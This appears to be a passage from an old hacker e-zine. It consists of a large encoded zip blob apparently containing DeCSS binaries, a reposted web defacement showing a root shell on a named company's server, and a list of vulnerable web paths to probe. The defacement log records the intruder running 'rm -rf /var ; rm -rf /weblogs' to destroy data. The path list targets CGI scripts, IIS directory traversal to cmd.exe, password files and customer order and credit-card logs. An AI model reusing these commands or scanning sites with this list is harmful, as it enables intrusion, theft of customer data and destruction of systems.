H8Ac+/hhXIlrcT9OJmnEkPVkk1N8G62nMXqU/pPFeIsYIsdJX+6Sy8xy84Kp NNXmF+Zls9HM87Z7jd5h7yNvIqyEatgGjbAbWuEIfACn4CxcgKsQ2Bw73ZbY p22FrbQb7a/tbvu+PWnP2C573l6z/zl8iV9JlIjucp0aix5ECGWhKa5TCI+h mRTRh+k0OpcW0xJaRsvpCrqavkrraDNtd73ooVPYBfkPOUgNVSNUroqqQlWs FqklqkJ9SyfqEXqM1trqafpRPV//RC/RlbpFt+sHzWTzvjlm/mY2e7/19ngj YRHsh3gdDwZHgz8H54JPg2vB9eBWMNSOsRl2ouXWt3k2alfZOttk37H77Kc2 ISshIWtQQkIGKkAz0XrUjObiYvysq+cW/CZuxgdwGz6Bv8CDyO1kOLmPKJJN HiG1pIn8gewnh0gbOeaqPZpyCjTLeWwqzaF5tIBG6Ru0wXmtyXVhFMtgWewH LIflsQL2NNvEjrMO1sm6WDfrcV67wvqY4Vk8m091btvknHaIzxMLxFpxXAiZ J2fIfDVb/VAtUKWqQcXUH1W7Oqk6ndO+VoP1MJ2iR2qhQZfp5bpWb9E7dZvu 0B/ri/q6vqmHmPvN94wx+WaWWWxOm6um36R56d4Ub6a31lvvNXgfez3eEBgF ATwFZbAd3oJm1/sEP9lP8/P8Qn+rv9N/1z/un/V7/b/7n/u5wePBa8H54LA9 Z+PLlPgS6240GnE0CeWjGtSNPkfYuXI6LsLV+FVcj5vwe/gy/gp75FGykDxH XiFvklZyhJwivWSuc8Uv6Vu0lTJXlfu45rm8lnfz6zwi0tycGTFZzBBzxUJR JlaLrWKXOOTqckkkyu/I70pPPumm7yt5Sw5V051n1qh1qlP3OeW3dMQMM4mG O93PmnJTYVaaKrPW1JgNptacN73miulztZjpzfMqvNWuFjXeBu9t76yXBClw D6TCvZAOmTABECyDCjcfVbAW5vsr/HGB7yrwVJBQ6Dwf9w4ej5fgVc4pw8kI kkEW0jV0I91K36H7ncNv0mSWxiybzIpZKXueVbAq9jqLsWZ2kB1lp9hgnsxH 8nSXNooHfAV/kdfwV/iv+G7+Ls8UD4kcMUeUilVO+duiRZwQ18TXIkmOluOd 9mlyuozKIjlf/lQuky/IKrlObpD18oD8i7qskvVMNzFr9O90p76ix5mJ5jGz wKxyFdhmdpgzpsdcMl+a27y93ntel5fmdM5y/V/+TRK0w00Y7mf4xX69H/MT g+EBcqofCQqCJ4PiYHHwcrAzOBJcDKx93FbZPhtfjkWdD76NZqFCVI7WoY2o ATWhVnQS9aABlIqfwSvxWEJcLi8iB2gHfYzNYc+xc2wcn+Bydo1TmyJGiUxR KbaLv4rPRERmyW0yfqobv57zHpyOG3AM9+EBfINFeAGP8kJexEt4KY8vcFO/ yZ87USqqxZtxnXu20bkuhuNBGs+mNtzhEjJCUkgPuUL6yQCJ0ESaQlNpOp1A mZvebDe5BXQ2LXJ+LKVLaR/v5zf4AE8QETFMJAoECgCyIBumQg7kQQFEYTYU QpGbmhIohcWwFMr/65Ma2AC1sBnq4DfQ4FK1CWKwB/a6bD0Ebe4N8CF0QCd0 QTf0QT/cgAE3bxF/mJ/o3+mn+Pf6e/1WP/wACAkJCQkJCfl/499QSwMEFAAC AAgAIKCrJBMUZ68wGwAAAJAAABAAAABXbmFzcGkzMi53OTguZGxs7Dt/dJNV lt+XfGnTkjYFGyi/nMjEI56O2BKK1BgNaAIqSGpo6g7QUiHaBmi76ffV7hxg Ur9USZ85ui476/F4zkyoeDzD7o6zR7v1x2gg0hSojqIDLMwozoJ+GJwtIqVi 6Lf3vvel/PTM7NndvybvkLz37rvvvnvvu/e++17osh8/w+k5jhPgo6oc18+x 4uL+fAnDp/gHbxRzrxa8d0M/v/S9G1Y0Nbdb20Ktj4YaN1rXNra0tIrWhwPW kNRibW6x3rPcZ93Yui4wp6io0KbR8Lo5bimfz/UvX1yVpXuMK75hAq+by82A jhU+eRz3ugXqEvhUIMa2TtqGD6/N0XOFrPELJsxNG3hORwElbN54rVVtHPcs 1ms47nE9E2ad/hpCPsNxm3Tc/3mZIwY6RRRtmsaQlRvnL1sAtGbOw+3t2I4I WdmvuQ+JOesaxUbsTNQ2z3o1vgvxmhkilXmNtqb3KjzXnADDe1bTFcVbcw28 UHtoLafpLqzhtV0LL7ChFRBn65lOKV74KrxFXK7kSq7kSq7kSq7kSq7kSq7k Sq78vxRyj83o83cnRLM8yov39ON9un7lbhMX51zbOknVu2u2daYMRmgj9oBh VeW2Tt6rHiRFVoDVqAfjAtQAuDgTSJp6HwI8pQEuzpGEOXIMhpRnodMNnY+w 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 /uyY8uF8AWYCnpK4CVAXDN371J1kSZUt2RbIH0Eei8mExrJ1UJGzpEgnx3Yh pQ2dTBOakqI005SQydekhH5AoK3Tob0OpdQhQNtEnZYOacChxdN0WiZtRnLD JH17kopsoDOdTtL+sT/Nu/d2993bd3uy5nZP8ulWcG9nu8ffcSmzoL+jtTzP 7kBnMFhWQTfJdMyIDmiFWrz4oPdyf9uWGbIuevyZodmoGlBT/3Wo6ZXjZtT0 55HfRD2P+qOmXxC6iJre4a9fnRlahPpO1PQCdBvqYdQZ1CP0Wgo1vUg6iJou 0I2u/s+ueWdxU/3rppUV7r+/hmYwGIz/FThd+0l10V6MdlXR/lqZ/WW0ZxXt h8vsr5TZO8rsR8rsr5bZO8ts+qW8mSj0A3QOOw0MBoPBYDAYDAaDwWBMob4X YN/eFoneMzD6AQ72Xtkv0QfQFQboRUmgbEV5GGU3ykGUoyhZlDMoF1BmoX8t Sj2KjBJAuQNlA8qnsP0+1NtRdqG8iHIIZQwli3IO5W2UKsznRpQGFC/Knf2F XJb6Js1Pp3NmBmVTPGdGzuTM8a68+Z2xnPlcIme+MZIzE8snzYUrJs2de/Pm t36WNy+unDSPZfPmb+bnzZx30jyCdZ99fdLcdsOk+ZInb55/P2e+O5gzbzub N89h3atbcqYRyplfXJcz99+bM3+N/TzZlDd/hfHueylnPoNCcxmtWKul0gNa t7UMDyBCMxqG1p42tCEPwIpi2TeoxQwsu4vlkv9N0KzHU1pbOBbRNXgTWjUj EE4ZPrqsDcBVhsJRoyWeDEZjG3Wts2+T1m+AH7zWyrw/3hyPGcm4DiuLUVui uuaB8xVBzbA6BDiA+elaOFVICOBV2oPv0q2KoJHE0Cl4itY3xwcGMJFANIZR +Aqs6dGSqWg8BhAB31DU6ErG+7VUCl62vNPJJEYoHIkfj2VBZbeewq57wnpa g3m05NGt//o3n9otSU2DGmq1lnyWVfYU7gpYbUtKpeJeb9Fe2uORtG4dWEd4 ANOCDK31NHcB5KnV6Wun9uNWRl3+2IY4zKeZB41IcVDh97SNRugeTmgwt9Aa xp4S1N0DTZWhZLQweHBHhT8WNaJhPTqiNWNttD+sBzXrhgW04LjrmnFZ/e3g ixlacno16BUBLTx4mTus8a3t8AUEflVE19knEIPBYDAYDAaDwfgw+dPKnZ+k enWi8PVpep+e3k+vx7KC4kXpnYvz/rkF/33zAEJYdzfK1kTBtwJCHYXfCFiz GjpFs0reQKA0h/xXXTCdSMSThjVXC2qxSKG2OPlkp4PBYDAYDAaDwWAwGIwP hIni/J/O4unvpBYWn8xWXk/XBchV6ttQerGl6grPz6u6RsRtDwThLtz6YC1a fuiEDiz7cduCNuVHVX99r7D6UFH8CXdBu0tx8DX9MXx9ldQrCAYkIQox2IjR oqCDhpFjsAHi6OOyfAiIKKql+6zH4hGYjfXN6DMACQij/zBmE8aSZsX2QARL CYytAf3aQQfUoH8pvhclhfW0X+oTxTix4n5B6ML+66z+k6hD1nEKwKPthQC+ KDJcWxavByWJES/F4aAB/cmULYWHObgfPT7D2ieGWeplmYfQLuVA+wRr9Gtx nwC2b7S86VEn8Hhp9hvhM0CfQ3h5XR3sQZk6DnWYl4qvwqMam+B6jNtZ3Cda zKV0TLGr5rSqbBz64FaM0YUx4thTGvswpp2Hfzee7daZC2PvmtU21aeUp90a 66l9TB9x/irj7bXeiT3YR/IK7y6AJdZqWTe20kxS2B6e8n6YXbWvin3CMBgM BoPBYDAYjP8LcMK/FSfataSOLCOE2EkTWUe2ke3kMbKLPEv2kFFikqPkBMmS N8kF8g55j8zgFnCf4JzcGi7MbeLu5bZyT3Df4/7BVfOLeJ5v5W/nH+QP86f5 cf48/zd+hnCdcLOwVOAFh7BaSAkjwrPCXmG/MCocFl4RssJZ4S2hUqwW14sR MSluEe8XvyQ+Kn5DfF48II6KJ8Ws+I74rlgj1Uq3SMulVikgrZVC0qD0eekB 6ZfSGWmNHJeH5d3y8/KL8g/kI/LL8vvyPFut7TZbg81ta7Gtsa2zrbeN2Ezb EdtZ24TtbdtM5WZluUIUh9KlhJQTSlY5rfxB+YuSV2ao1apT9aqD6jb1IfVR 9cdqVj2t/lFdbJftP7T/1D5mP2k/ZRccqmO7I+v4fuMvGq93fsy5wqk4m5wP Oh9z7nI+5TzunOFa6FrqElwbXPe7drqecx11jbsmXB9xV7sXupe5G90ed5v7 Lvce9wm6uFEHMIaqktxAFpClpJH4yXpyNzHI58jj5BA5Rl4j4+QijvmN3E3c LdwyTsSRH+DS3BYuw73CTeC4A/80/wJ/hD/Jn+LP8ItxXFeKgniPOIxj+ZD4 iHgcx/B34rh4nbRK6pQ2Szukr0sHpDHppJSVquW58iL543K/nJQfkA/Jh+XX 5FPyG/K3cbyO2uYoNcqtSr0iK5uUe5QvKBnlCeW7ys+VCeWCMlNdpO5Wn1b3 q8fU11X6xCS60rOEtJEdJEOO27P20/Zz9j/b/26/aK9yXOuocXzUscTR4BAd jQ7dsRlHkP3xMRgMBoPBYDAYDMaHxz8BUEsBAhQAFAACAAgAe4tMJwsWduNp AgAAGgYAAAoAAAAAAAAAAQAgALaBAAAAAHJlYWRtZS50eHRQSwECFAAUAAIA CAC6jUwntRjr0dtuAAAAdgAACQAAAAAAAAAAACAA/4GRAgAARGVDU1MuZXhl UEsBAhQAFAACAAgAUZlCJtHnMODoVQAAAOAAABAAAAAAAAAAAAAgALaBk3EA AHduYXNwaTMyLncyay5kbGxQSwECFAAUAAIACAAgoKskExRnrzAbAAAAkAAA EAAAAAAAAAAAACAAtoGpxwAAV25hc3BpMzIudzk4LmRsbFBLBQYAAAAABAAE AOsAAAAH4wAAAAA= ==== ------------------------ END ------------------------------ BlaznWeed's recent hack: http://www.attrition.org/mirror/attrition/2000/04/10/web1.carsacrossamerica.com/mirror.html bash# uname -a ; w ;id Linux web1.carsacrossamerica.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown 10:52pm up 11 days, 8:56, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - 30Mar 0 11days 0.06s 0.02s -bash cars pts/0 216.3.51.40 3:33pm 7:08m 0.05s 0.05s -bash uid=0(root) gid=505(davem) groups=505(davem) bash#rm -rf /var ; rm -rf /weblogs sorry but i'm lazy :P /*********************************************************************/ This mpaa issue has gone on long enough. We as a global community cannot afford to let america control every aspect of our live. This isn't just about copying DVD's this is about retaining our rights to intellectual freedoms which the government of america will gladly allow the mpaa violate. If I purchase a dvd player I should have the right to do and/or view whatever I want on my private property. There should NO territorial lockout or encryption to stop me from using *my* property to its fullest. The retarded excuse for territorial lockout given by the movie industry is that they are able to release movies in countries at a time that would maximize there profits. The truth is however rather different the reason territorial lockout exists on players is, so they can brainwash harry homeowner with there own doctrine and minimize the possibility of foreign governments releasing materials which can be viewed by harry homeowner that would change his/her mind about certain political issues. I fully support 2600's stance against corparate bullies , if mpaa thinks they can wipeout decss by taking 2600 offline they got another thing coming. dowload css-auth below for the source code to decss (unix only) css-auth.tar download decss.zip below if your a windowz kid decss.zip -BlazinWeed Shouts: everyone in wkD and everyone else thats down with me you know who you be Fucks: mpaa (isn't that a suprise ?) , Freemasons and all you other bitches that sliped my mind Attrition lamer of the week: Mcm4nus .. this kiddies is responsible for a truck load of hacks that say jack shit "hacked by Mcm4nus " oh fuckin *pheer*. kiddies please if your going to deface something then at least fuckin say something. the decss link above obviously won't work when the admin removes the file so I also enclose the uuencode of the zip and tarball if you don't know how to decode these you suck. [snip] @HWA 05.0 b0f:Common WWW and CGI vulnerabilities list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /cgi-bin/whois_raw.cgi /cgi-bin/phf /cgi-bin/Count.cgi /cgi-bin/test-cgi /cgi-bin/nph-test-cgi /cgi-bin/php.cgi /cgi-bin/php-cgi /cgi-bin/handler /cgi-bin/handler.cgi /cgi-bin/webgais /cgi-bin/websendmail /cgi-bin/webdist.cgi /cgi-bin/faxsurvey /cgi-bin/htmlscript /cgi-bin/pfdispaly.cgi /cgi-bin/perl.exe /cgi-bin/bigconf.cgi /cgi-bin/wwwboard.pl /cgi-bin/www-sql /cgi-bin/htsearch /cgi-bin/view-source /cgi-bin/campas /cgi-bin/aglimpse /cgi-bin/get32.exe /cgi-bin/man.sh /cgi-bin/meta.pl /cgi-bin/AT-admin.cgi /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi-bin/maillist.cgi /cgi-bin/jj /cgi-bin/info2www /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger?@localhost /cgi-bin/bnbform.cgi /cgi-bin/survey.cgi /cgi-bin/AnyForm2 /cgi-bin/textcounter.pl /cgi-bin/classifieds.cgi /cgi-bin/classified.cgi /cgi-bin/environ.cgi /cgi-bin/fpexplore.exe /cgi-bin/imagemap.exe /cgi-bin/cgitest.exe /cgi-bin/anyboard.cgi /cgi-bin/webbbs.cgi /cgi-bin/visadmin.exe /cgi-bin/nph-publish /cgi-bin/perlshop.cgi /cgi-bin/wrap /cgi-bin/cgiwrap /cgi-bin/cachemgr.cgi /cgi-bin/query /cgi-bin/rpm_query /cgi-bin/ax.cgi /cgi-bin/ax-admin.cgi /cgi-bin/architext_query.pl /cgi-bin/w3-msql/ /cgi-bin/add_ftp.cgi /cgi-bin/test.bat /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/day5datacopier.cgi /cgi-bin/day5datanotifier.cgi /cgi-bin/whois.cgi /cgi-bin/mlog.phtml /cgi-bin/archie /cgi-bin/bb-hist.sh /cgi-bin/nph-error.pl /cgi-bin/post_query /cgi-bin/ppdscgi.exe /cgi-bin/webmap.cgi /cgi-bin/tigvote.cgi /cgi-bin/webutils.pl /cgi-bin/axs.cgi /cgi-bin/responder.cgi /cgi-bin/plusmail /cgi-bin/passwd.txt /cgi-bin/Cgitest.exe /cgi-bin/GW5/GWWEB.EXE /cgi-bin/webwho.pl /cgi-bin/search.cgi /cgi-bin/dbmlparser.exe /cgi-bin/search/tidfinder.cgi /cgi-bin/wa /cgi-bin/tablebuild.pl /cgi-bin/displayTC.pl /cgi-bin/uptime /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c /cgi-bin/c_download.cgi /cgi-bin/download.cgi /cgi-bin/program.pl /cgi-bin/ntitar.pl /cgi-bin/enter.cgi /cgi-bin/test.html /cgi-bin/test-unix.html /cgi-bin/printenv /cgi-bin/dasp/fm_shell.asp /cgi-bin/cgiback.cgi /cgi-bin/unlg1.1 /cgi-bin/unlg1.2 /cgi-bin/gH.cgi /cgi-bin/rwwwshell.pl /cgi-bin/php /cgi-bin/perl /cgi-bin/wwwboard.cgi /cgi-bin/guestbook.cgi /cgi-bin/guestbook.pl /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/password /cgi-bin/password.txt /cgi-bin/flexform.cgi /cgi-bin/MachineInfo /cgi-bin/lwgate /cgi-bin/lwgate.cgi /cgi-bin/LWGate /cgi-bin/LWGate.cgi /cgi-bin/nlog-smb.cgi /cgi-bin/icat /cgi-bin/tst.bat /com1 /com2 /com3 /con /_vti_pvt/service.pwd /_vti_pvt/users.pwd /_vti_pvt/authors.pwd /_vti_pvt/administrators.pwd /_vti_bin/shtml.dll /_vti_bin/shtml.exe /_vti_bin/fpcount.exe /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-win/uploader.exe /cgi-shl/win-c-sample.exe /scripts/issadmin/bdir.htr /scripts/CGImail.exe /scripts/tools/newdsn.exe /scripts/fpcount.exe /scripts/no-such-file.pl /scripts/counter.exe /scripts/uploadn.asp /scripts/convert.bas /scripts/iisadmin/ism.dll /scripts/tools/getdrvrs.exe /scripts/tools/dsnform.exe /scripts/samples/search/webhits.exe /scripts/../../cmd.exe /scripts/webbbs.exe /scripts/samples/ctguestb.idc /scripts/samples/details.idc /scripts/cpshost.dll /scripts/tools/getdrvs.exe /scripts/pu3.pl /scripts/proxy/w3proxy.dll /WebShop/templates/cc.txt /WebShop/logs/cc.txt /WebShop/logs/ck.log /config/orders.txt /config/import.txt /config/checks.txt /orders/order.log /orders/import.txt /orders/checks.txt /orders/orders.txt /Orders/order.log /order/order.log /cfdocs/expelval/openfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/snippets/fileexist.cfm /iissamples/exair/howitworks/codebrws.asp /iissamples/sdk/asp/docs/codebrws.asp /iissamples/iissamples/query.asp /iissamples/exair/search/advsearch.asp /iisadmpwd/achg.htr /iisadmpwd/aexp.htr /iisadmpwd/aexp2.htr /iisadmpwd/aexp2b.htr /iisadmpwd/aexp3.htr /iisadmpwd/aexp4.htr /iisadmpwd/aexp4b.htr /iisadmpwd/anot.htr /iisadmpwd/anot3.htr /pw/storemgr.pw /config/mountain.cfg /orders/mountain.cfg /quikstore.cfg /PDG_Cart/shopper.conf /search97.vts /carbo.dll /msadc/Samples/SELECTOR/showcode.asp /adsamples/config/site.csc /Admin_files/order.log /mall_log_files/order.log /PDG_Cart/order.log /doc /doc Boa?? 8-) /.html/............./config.sys /ssi/envout.bat /~root /server%20logfile /....../autoexec.bat /perl/files.pl /lpt /AdvWorks/equipment/catalog_type.asp /ASPSamp/AdvWorks/equipment/catalog_type.asp /admin.php3 /code.php3 /bb-dnbd/bb-hist.sh /domcfg.nsf /today.nsf /names.nsf /catalog.nsf /log.nsf /domlog.nsf /secure/.htaccess /secure/.wwwacl /WebSTAR /msadc/msadcs.dll /?PageServices /_AuthChangeUrl? /........./autoexec.bat /.html/............/autoexec.bat /......../ /eatme.idc /eatme.ida /eatme.pl /eatme.idq /eatme.idw 